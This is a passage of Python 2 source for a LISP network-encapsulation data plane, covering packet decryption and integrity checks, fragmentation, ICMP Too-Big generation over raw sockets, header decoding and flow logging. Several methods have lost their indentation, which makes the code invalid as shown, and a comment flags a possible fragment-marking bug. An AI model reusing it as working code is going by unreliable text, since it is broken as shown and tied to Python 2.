            ps = 8
            hash_str = bold("sha", False)
        #endif
        lisp = self.lisp_header.encode()
        #
        # Get the IV and use it to decrypt and authenticate.
        #
        if (key.cipher_suite == LISP_CS_25519_CHACHA):
            iv_len = 8
            cipher_str = bold("chacha", False)
        elif (key.cipher_suite == LISP_CS_25519_GCM):
            iv_len = 12
            cipher_str = bold("aes-gcm", False)
        else:
            iv_len = 16
            cipher_str = bold("aes-cbc", False)
        #endif
        iv = packet[0:iv_len]
        #
        # Compute ICV over LISP header and packet payload.
        #
        computed_icv = key.do_icv(lisp + packet, iv)
        p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
        c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
        if (computed_icv != packet_icv):
            self.packet_error = "ICV-error"
            funcs = cipher_str + "/" + hash_str
            fail = bold("ICV failed ({})".format(funcs), False)
            icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
            dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
                "packet dropped, {}").format(fail, red(addr_str, False),
                self.udp_sport, key.key_id, icv_str))
            dprint("{}".format(key.print_keys()))
            #
            # This is the 4-tuple NAT case. There another addr:port that
            # should have the crypto-key the encapsulator is using. This is
            # typically done on the RTR.
            #
            lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
            return([None, False])
        #endif
        #
        # Advance over IV for decryption.
        #
        packet = packet[iv_len::]
        #
        # Call AES or chacha cipher. Make sure for AES-CBC that the
        # ciphertext is a multiple of 16 bytes (checked below).
        #
        ts = lisp_get_timestamp()
        if (key.cipher_suite == LISP_CS_25519_CHACHA):
            decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
        elif (key.cipher_suite == LISP_CS_25519_GCM):
            k = binascii.unhexlify(key.encrypt_key)
            try:
                decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
            except:
                self.packet_error = "no-decrypt-key"
                lprint("You need AES-GCM, do a 'pip install pycryptodome'")
                return([None, False])
            #endtry
        else:
            if ((len(packet) % 16) != 0):
                dprint("Ciphertext not multiple of 16 bytes, packet dropped")
                return([None, False])
            #endif
            k = binascii.unhexlify(key.encrypt_key)
            decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
        #endif
        plaintext = decrypt(packet)
        # Microsecond fraction of elapsed time, used only in the log below.
        ts = int(str(time.time() - ts).split(".")[1][0:6])
        #
        # Now decrypt packet and return plaintext payload.
        #
        string = bold("Decrypt", False)
        addr_str = "RLOC: " + red(addr_str, False)
        auth = "poly" if key.do_poly else "sha256"
        auth = bold(auth, False)
        icv_str = "ICV({}): {}".format(auth, p_icv)
        dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
            format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
        #
        # Keep self.packet the outer header, UDP header, and LISP header.
        # We will append the plaintext in the caller once we parse the inner
        # packet length so we can truncate any padding the encryptor put on.
        #
        self.packet = self.packet[0:header_length]
        return([plaintext, True])
    #enddef
    def fragment_outer(self, outer_hdr, inner_packet):
        #
        # Fragment at the OUTER IPv4 header (used when the inner packet is
        # IPv6 or a MAC frame and cannot itself be fragmented). Returns a
        # list of complete IPv4 packets, each carrying at most frag_len
        # payload bytes.
        #
        frag_len = 1000
        #
        # Break up packet payload in fragments and put in array to have
        # IP header added in next loop below.
        #
        frags = []
        offset = 0
        length = len(inner_packet)
        while (offset < length):
            frag = inner_packet[offset::]
            if (len(frag) > frag_len): frag = frag[0:frag_len]
            frags.append(frag)
            offset += len(frag)
        #endwhile
        #
        # Now fix outer IPv4 header with fragment-offset values and add the
        # IPv4 value.
        #
        fragments = []
        offset = 0
        for frag in frags:
            #
            # Set frag-offset field in outer IPv4 header. The more-fragments
            # bit (0x2000) is set on all but the last fragment.
            # NOTE(review): 'frag == frags[-1]' compares fragment CONTENTS,
            # so a middle fragment byte-identical to the last one would also
            # be marked last -- confirm this cannot occur in practice.
            #
            fo = offset if (frag == frags[-1]) else 0x2000 + offset
            fo = socket.htons(fo)
            outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
            #
            # Set total-length field in outer IPv4 header and checksum.
            #
            l = socket.htons(len(frag) + 20)
            outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
            outer_hdr = lisp_ip_checksum(outer_hdr)
            fragments.append(outer_hdr + frag)
            # Fragment offsets are in 8-byte units (python2 int division).
            offset += len(frag) / 8
        #endfor
        return(fragments)
    #enddef
    def send_icmp_too_big(self, inner_packet):
        #
        # Send a rate-limited ICMP Destination Unreachable (Too-Big,
        # type 3/code 4) with MTU 1400 back to the inner packet's source.
        # Returns True when the message was sent, False when rate-limited
        # or the raw-socket send failed.
        #
        global lisp_last_icmp_too_big_sent
        global lisp_icmp_raw_socket
        elapsed = time.time() - lisp_last_icmp_too_big_sent
        if (elapsed < LISP_ICMP_TOO_BIG_RATE_LIMIT):
            lprint("Rate limit sending ICMP Too-Big to {}".format( \
                self.inner_source.print_address_no_iid()))
            return(False)
        #endif
        #
        # Destination Unreachable Message - Too Big Message
        #
        #     0                   1                   2                   3
        #     0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
        #    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        #    |   Type = 3    |   Code = 4    |          Checksum             |
        #    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        #    |           unused              |         MTU = 1400            |
        #    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        #    |      Internet Header + 64 bits of Original Data Datagram      |
        #    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
        #
        mtu = socket.htons(1400)
        icmp = struct.pack("BBHHH", 3, 4, 0, 0, mtu)
        icmp += inner_packet[0:20+8]
        icmp = lisp_icmp_checksum(icmp)
        #
        # Build IP header. Make source of ICMP invoking packet the destination
        # and our address the source. We can get our address when we thought
        # we could encap. So lisp_packet.outer_source has the RLOC address of
        # this system.
        #
        host = inner_packet[12:16]
        dest = self.inner_source.print_address_no_iid()
        me = self.outer_source.pack_address()
        #
        # IP_HDRINCL requires the total-length and frag-offset fields to be
        # host byte order. We need to build the total-length field just like
        # lisp_packet.encode(), checksum, and then fix outer header. So that
        # logic is semantically replicated here. Same logic is in lisp_packet.
        # fragment() as well.
        #
        tl = socket.htons(20+36)
        ip = struct.pack("BBHHHBBH", 0x45, 0, tl, 0, 0, 32, 1, 0) + me + host
        ip = lisp_ip_checksum(ip)
        ip = self.fix_outer_header(ip)
        ip += icmp
        tb = bold("Too-Big", False)
        lprint("Send ICMP {} to {}, mtu 1400: {}".format(tb, dest,
            lisp_format_packet(ip)))
        try:
            lisp_icmp_raw_socket.sendto(ip, (dest, 0))
        except socket.error, e:
            lprint("lisp_icmp_raw_socket.sendto() failed: {}".format(e))
            return(False)
        #endtry
        #
        # Caller function sends packet on raw socket. Kernel routes out
        # interface to destination.
        #
        lisp_last_icmp_too_big_sent = lisp_get_timestamp()
        return(True)
    #enddef
    def fragment(self):
        #
        # Fragment self.packet when it exceeds 1500 bytes. Returns a tuple
        # (list-of-packets, how) where 'how' is one of "Fragment-None",
        # "Fragment-Outer", "Fragment-Inner", "Fragment-None-DF-bit", or
        # None when an ICMP Too-Big was sent instead.
        #
        global lisp_icmp_raw_socket
        global lisp_ignore_df_bit
        packet = self.fix_outer_header(self.packet)
        #
        # If inner header is IPv4, we will fragment the inner header and encap
        # each fragment. If the inner header is IPv6, we will not add the
        # Fragmentation Header into the inner IPv6 packet.
        #
        length = len(packet)
        if (length <= 1500): return([packet], "Fragment-None")
        packet = self.packet
        #
        # Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
        # We cannot fragment IPv6 packet since we are not the source.
        #
        if (self.inner_version != 4):
            ident = random.randint(0, 0xffff)
            outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
            inner_packet = packet[20::]
            fragments = self.fragment_outer(outer_hdr, inner_packet)
            return(fragments, "Fragment-Outer")
        #endif
        #
        # Fragment inner IPv4 packet. Outer headers are IP + UDP + LISP:
        # 36 bytes for IPv4 outer, 56 for IPv6 outer.
        #
        outer_hdr_len = 56 if (self.outer_version == 6) else 36
        outer_hdr = packet[0:outer_hdr_len]
        inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
        inner_packet = packet[outer_hdr_len + 20::]
        #
        # If DF-bit is set, don't fragment packet. Do MTU discovery if
        # configured with env variable.
        #
        frag_field = struct.unpack("H", inner_hdr[6:8])[0]
        frag_field = socket.ntohs(frag_field)
        if (frag_field & 0x4000):
            if (lisp_icmp_raw_socket != None):
                inner = packet[outer_hdr_len::]
                if (self.send_icmp_too_big(inner)): return([], None)
            #endif
            if (lisp_ignore_df_bit):
                frag_field &= ~0x4000
            else:
                df_bit = bold("DF-bit set", False)
                dprint("{} in inner header, packet discarded".format(df_bit))
                return([], "Fragment-None-DF-bit")
            #endif
        #endif
        # Carve the inner payload into 1400-byte pieces.
        offset = 0
        length = len(inner_packet)
        fragments = []
        while (offset < length):
            fragments.append(inner_packet[offset:offset+1400])
            offset += 1400
        #endwhile
        #
        # Now put inner header and outer header on each fragment.
        #
        frags = fragments
        fragments = []
        mf = True if frag_field & 0x2000 else False
        frag_field = (frag_field & 0x1fff) * 8
        for frag in frags:
            #
            # Set fragment-offset and MF bit if not last fragment.
            # Offsets are in 8-byte units (python2 integer division).
            #
            ff = frag_field / 8
            if (mf):
                ff |= 0x2000
            elif (frag != frags[-1]):
                ff |= 0x2000
            #endif
            ff = socket.htons(ff)
            inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
            #
            # Set length of fragment, set up offset for next fragment-offset,
            # and header checksum fragment packet. Then prepend inner header
            # to payload.
            #
            length = len(frag)
            frag_field += length
            l = socket.htons(length + 20)
            inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
                inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
            inner_hdr = lisp_ip_checksum(inner_hdr)
            fragment = inner_hdr + frag
            #
            # Change outer header length and header checksum if IPv4 outer
            # header. If IPv6 outer header, raw sockets prepends the header.
            #
            length = len(fragment)
            if (self.outer_version == 4):
                l = length + outer_hdr_len
                length += 16
                outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
                    outer_hdr[4::]
                outer_hdr = lisp_ip_checksum(outer_hdr)
                fragment = outer_hdr + fragment
                fragment = self.fix_outer_header(fragment)
            #endif
            #
            # Finally fix outer UDP header length. Byte-swap it.
            #
            udp_len_index = outer_hdr_len - 12
            l = socket.htons(length)
            fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
                fragment[udp_len_index+2::]
            fragments.append(fragment)
        #endfor
        return(fragments, "Fragment-Inner")
    #enddef
    def fix_outer_header(self, packet):
        #
        # IP_HDRINCL requires the total-length and frag-offset fields to be
        # in host byte order. So have to byte-swapped here. But when testing
        # we (UPC guys) discovered the frag field didn't need swapping. The
        # conclusion is that byte-swapping is necessary for MacOS but not for
        # Linux OSes.
        #
        # Python2 note: packet[2] and packet[3] are 1-character strings, so
        # the concatenation below swaps the two total-length bytes (and on
        # MacOS the two frag-offset bytes as well).
        #
        if (self.outer_version == 4 or self.inner_version == 4):
            if (lisp_is_macos()):
                packet = packet[0:2] + packet[3] + packet[2] + packet[4:6] + \
                    packet[7] + packet[6] + packet[8::]
            else:
                packet = packet[0:2] + packet[3] + packet[2] + packet[4::]
            #endif
        #endif
        return(packet)
    #enddef
    def send_packet(self, lisp_raw_socket, dest):
        #
        # Log the flow if enabled, fragment if needed, then send each
        # fragment to 'dest' (a lisp_address) on the supplied raw socket.
        #
        if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
        dest = dest.print_address_no_iid()
        fragments, in_or_out = self.fragment()
        for fragment in fragments:
            # Only print per-fragment detail when we actually fragmented.
            if (len(fragments) != 1):
                self.packet = fragment
                self.print_packet(in_or_out, True)
            #endif
            try: lisp_raw_socket.sendto(fragment, (dest, 0))
            except socket.error, e:
                lprint("socket.sendto() failed: {}".format(e))
            #endtry
        #endfor
    #enddef
    def send_l2_packet(self, l2_socket, mac_header):
        #
        # Prepend the supplied MAC header and write the frame to the tuntap
        # device used for IPv6 decapsulated packets. Drops the packet (with
        # a log message) when either argument is missing.
        #
        if (l2_socket == None):
            lprint("No layer-2 socket, drop IPv6 packet")
            return
        #endif
        if (mac_header == None):
            lprint("Could not build MAC header, drop IPv6 packet")
            return
        #endif
        packet = mac_header + self.packet
        # Historic raw-socket transmit path, kept for reference:
        # try: l2_socket.send(packet)
        # except socket.error, e:
        #     lprint("send_l2_packet(): socket.send() failed: {}".format(e))
        # #endtry
        # return
        #
        # Use tuntap tunnel interface instead of raw sockets for IPv6
        # decapsulated packets.
        #
        l2_socket.write(packet)
        return
    #enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error, e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def is_lisp_packet(self, packet):
udp = (struct.unpack("B", packet[9])[0] == LISP_UDP_PROTOCOL)
if (udp == False): return(False)
port = struct.unpack("H", packet[22:24])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
port = struct.unpack("H", packet[20:22])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
return(False)
#enddef
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = 0
if (is_lisp_packet):
iid = self.lisp_header.get_instance_id()
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key,
addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
self.inner_is_fragment = (frag_field & 0x2000 or frag_field != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
    def print_packet(self, s_or_r, is_lisp_packet):
        """Print a one-line debug summary of this packet via dprint().

        s_or_r is a direction/action label (e.g. "Send", "Receive",
        "Replicate", or a "Fragment..." string); is_lisp_packet selects
        whether outer RLOC/UDP/LISP header fields are included.
        """
        if (is_lisp_packet == False):
            iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
                self.inner_dest.print_address())
            dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
                format(bold(s_or_r, False),
                green(iaddr_str, False), self.inner_tos,
                self.inner_ttl, len(self.packet),
                lisp_format_packet(self.packet[0:60])))
            return
        #endif
        # Derive an encap/decap label from the direction string.
        if (s_or_r.find("Receive") != -1):
            ed = "decap"
            ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
        else:
            ed = s_or_r
            if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
                ed = "encap"
            #endif
        #endif
        oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
            self.outer_dest.print_address_no_iid())
        #
        # Special case where Info-Request is inside of a 4341 packet for
        # NAT-traversal.
        #
        if (self.lisp_header.get_instance_id() == 0xffffff):
            line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
                "{}/{}, outer UDP: {} -> {}, ")
            line += bold("control-packet", False) + ": {} ..."
            dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
                self.outer_tos, self.outer_ttl, self.udp_sport,
                self.udp_dport, lisp_format_packet(self.packet[0:56])))
            return
        else:
            line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
                "{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
                "inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
        #endif
        # Reflect encryption status in the encap/decap label.
        if (self.lisp_header.k_bits):
            if (ed == "encap"): ed = "encrypt/encap"
            if (ed == "decap"): ed = "decap/decrypt"
        #endif
        iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
            self.inner_dest.print_address())
        dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
            self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
            green(iaddr_str, False), self.inner_tos, self.inner_ttl,
            len(self.packet), self.lisp_header.print_header(ed),
            lisp_format_packet(self.packet[0:56])))
    #enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (lisp_iid_to_interface.has_key(iid) == False): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
    def log_flow(self, encap):
        """Append this packet to the in-memory flow log.

        encap is True when the packet is being encapsulated, False when
        decapsulated. When the log reaches LISP_FLOW_LOG_SIZE entries,
        or the trigger file ./log-flows exists, the accumulated entries
        are handed to a writer thread and a fresh log is started.
        """
        global lisp_flow_log
        # Touching ./log-flows forces an immediate flush to disk.
        dump = os.path.exists("./log-flows")
        if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
            args = [lisp_flow_log]
            lisp_flow_log = []
            # Write on a separate thread so forwarding is not blocked
            # by disk I/O.
            threading.Thread(target=lisp_write_flow_log, args=args).start()
            if (dump): os.system("rm ./log-flows")
            return
        #endif
        ts = datetime.datetime.now()
        lisp_flow_log.append([ts, encap, self.packet, self])
    #enddef
    def print_flow(self, ts, encap, packet):
        """Return a one-line flow-log string for this packet.

        ts is the datetime captured when the packet was logged, encap
        is True/False for direction, and packet is the raw buffer as
        logged. Called from the flow-log writer thread.
        """
        ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
        flow = "{}: {}".format(ts, "encap" if encap else "decap")
        osrc = red(self.outer_source.print_address_no_iid(), False)
        odst = red(self.outer_dest.print_address_no_iid(), False)
        isrc = green(self.inner_source.print_address(), False)
        idst = green(self.inner_dest.print_address(), False)
        # Instance-id 0xffffff marks a LISP control message carried in
        # a data packet (NAT-traversal); log it without inner fields.
        if (self.lisp_header.get_instance_id() == 0xffffff):
            flow += " {}:{} -> {}:{}, LISP control message type {}\n"
            flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
                self.inner_version)
            return(flow)
        #endif
        if (self.outer_dest.is_null() == False):
            flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
            flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
                len(packet), self.outer_tos, self.outer_ttl)
        #endif
        #
        # Can't look at inner header if encrypted. Protecting user privacy.
        #
        if (self.lisp_header.k_bits != 0):
            error = "\n"
            if (self.packet_error != ""):
                error = " ({})".format(self.packet_error) + error
            #endif
            flow += ", encrypted" + error
            return(flow)
        #endif
        #
        # Position to inner header.
        #
        if (self.outer_dest.is_null() == False):
            packet = packet[36::] if self.outer_version == 4 else packet[56::]
        #endif
        # NOTE: single-byte indexing assumes a Python 2 str buffer.
        protocol = packet[9] if self.inner_version == 4 else packet[6]
        protocol = struct.unpack("B", protocol)[0]
        flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
        flow = flow.format(isrc, idst, len(packet), self.inner_tos,
            self.inner_ttl, protocol)
        #
        # Show some popular transport layer data.
        #
        if (protocol in [6, 17]):
            ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
            if (len(ports) == 4):
                ports = socket.ntohl(struct.unpack("I", ports)[0])
                flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
            #endif
        elif (protocol == 1):
            seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
            if (len(seq) == 2):
                seq = socket.ntohs(struct.unpack("H", seq)[0])
                flow += ", icmp-seq {}".format(seq)
            #endif
        #endif
        if (self.packet_error != ""):
            flow += " ({})".format(self.packet_error)
        #endif
        flow += "\n"
        return(flow)
    #enddef
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
